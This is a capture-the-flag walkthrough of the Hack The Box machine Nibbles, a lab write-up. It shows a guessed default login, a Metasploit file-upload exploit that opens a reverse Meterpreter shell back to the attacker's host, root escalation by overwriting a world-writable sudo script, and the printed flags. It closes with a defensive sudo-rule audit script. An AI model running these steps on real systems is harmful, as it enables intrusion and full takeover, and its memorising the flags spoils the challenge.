[HTB] Nibbles

Today we are going to hack the HTB machine called Nibbles. It is rated as easy.

Video


Enumeration


To start, we run an nmap scan to see which ports are open.

sml@m0nikE:~$ nmap -A -p- 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 15:19 CET
Nmap scan report for 10.10.10.75
Host is up (0.039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds
In the source code of the web page we see the following comment:

/nibbleblog/ directory. Nothing interesting here!
Knowing that it is the Nibbleblog CMS, we look for an exploit that might be useful.

Exploitation


We find an exploit that may work, but it requires a username/password. If we look for information, we will see that the default user is admin, which is the one we are going to use; however, the password had to be "guessed", turning out to be nibbles. Knowing the credentials, we can now use the exploit.

msf5 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > show options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3


msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.10.10.75
rhosts => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit

[-] Exploit failed: The following options failed to validate: USERNAME, PASSWORD.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.75:47108) at 2019-11-02 15:30:42 +0100
[+] Deleted image.php
meterpreter > shell
Process 1446 created.
Channel 1 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

user.txt



cd /home
ls
nibbler
cd nibbler
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt
cat user.txt
b02ff32bb332deba49eeaed21152c8d8

Privilege Escalation


In nibbler's home directory we see a .zip file called personal. We unzip it.

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh 
If we look at the code we see that monitor.sh cannot help us escalate privileges by itself, so we keep looking for a clue. We use the sudo -l command to see whether our user can run any command using sudo...

$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
We see that our user can run the monitor.sh script we just unzipped with sudo as root. So this case is as simple as adding a line to the script that executes bash, and that should be enough to get a shell with root privileges.

$ ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 10 Nov  2 10:57 monitor.sh
$ echo "/bin/bash" > monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff#
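The root cause of this escalation is a NOPASSWD sudo rule whose target script is owned by the unprivileged user and is world-writable. As an added defensive check (not part of the original writeup), the script below parses `sudo -l` output and flags every rule whose target an unprivileged user could rewrite or create. The sudo output and the file metadata are constructed samples modelled on this box; on a real host you would pass a lookup function wrapping os.stat() instead of FAKE_FS.get.

```python
import re
import stat

# Constructed sample of `sudo -l` output, modelled on the rule seen on Nibbles.
SAMPLE_SUDO_L = """Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) /usr/bin/apt-get
"""

# Constructed stand-in for os.stat() results: path -> (owner uid, permission bits).
FAKE_FS = {
    "/home/nibbler/personal/stuff/monitor.sh": (1001, 0o777),  # user-owned, world-writable
    "/usr/bin/apt-get": (0, 0o755),  # root-owned, writable only by root
}

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_entries(text):
    """Return (runas, tags, command_path) for every rule listed under 'may run'."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if m:
            tags = re.findall(r"\w+", m.group("tags"))  # e.g. ["NOPASSWD"]
            cmd_path = m.group("cmd").split()[0]  # executable only, drop arguments
            entries.append((m.group("runas"), tags, cmd_path))
    return entries

def audit_sudo_targets(text, lookup):
    """Flag rules whose target a non-root user could rewrite; lookup(path) -> (uid, mode) or None."""
    findings = []
    for runas, tags, cmd in parse_sudo_entries(text):
        info = lookup(cmd)
        reasons = ["target does not exist"] if info is None else []
        if info is not None:
            uid, mode = info
            if uid != 0:
                reasons.append(f"owned by uid {uid}, not root")
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group- or world-writable")
        if reasons:
            findings.append({"runas": runas, "nopasswd": "NOPASSWD" in tags,
                             "cmd": cmd, "reasons": reasons})
    return findings
```

Running `audit_sudo_targets(SAMPLE_SUDO_L, FAKE_FS.get)` reports only monitor.sh, for both its non-root owner and its write bits; the fix on a real host is to make sudo targets root-owned and not group/world-writable.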

root.txt



root@Nibbles:~/personal/stuff# cd /root
root@Nibbles:/root# cat root.txt 
b6d745c0dfb6457c55591efc898ef88c

End


And with this we would have both the "user" flag and the "root" flag.